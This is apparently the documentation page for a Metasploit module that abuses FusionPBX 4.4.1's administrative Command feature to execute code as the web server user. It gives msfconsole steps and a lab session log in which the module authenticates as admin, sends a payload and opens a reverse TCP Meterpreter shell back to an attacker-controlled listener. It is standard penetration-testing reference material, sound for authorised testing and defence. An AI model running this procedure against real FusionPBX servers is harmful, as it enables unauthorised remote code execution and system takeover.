Brendan Coles
2.1 KiB
2.1 KiB
Description
This module uses administrative functionality available in FusionPBX to gain a shell.
The Command section of the application permits users with exec_view
permissions, or superadmin permissions, to execute arbitrary system
commands, or arbitrary PHP code, as the web server user.
Vulnerable Software
This module has been tested successfully on FusionPBX version 4.4.1 on Ubuntu 19.04 (x64).
Software:
Verification Steps
- Start
msfconsole - Do:
use exploit/unix/webapp/fusionpbx_exec_cmd_exec - Do:
set rhosts <IP> - Do:
set username <username>(default:admin) - Do:
set password <password> - Do:
run - You should get a new session
Options
TARGETURI
The base path to FusionPBX (default: /)
USERNAME
The username for FusionPBX (default: admin)
PASSWORD
The password for FusionPBX
Scenarios
msf5 > use exploit/unix/webapp/fusionpbx_exec_cmd_exec
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214
rhosts => 172.16.191.214
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin
username => admin
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc
password => PXRtwZqSkvToC4gc
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic (PHP In-Memory)
1 Automatic (Unix In-Memory)
2 Automatic (Linux Dropper)
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] Authenticated as user 'admin'
[*] Sending payload (1115 bytes) ...
[*] Sending stage (38288 bytes) to 172.16.191.214
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.214:60772) at 2019-11-01 19:25:43 -0400
meterpreter > getuid
Server username: www-data (33)
meterpreter >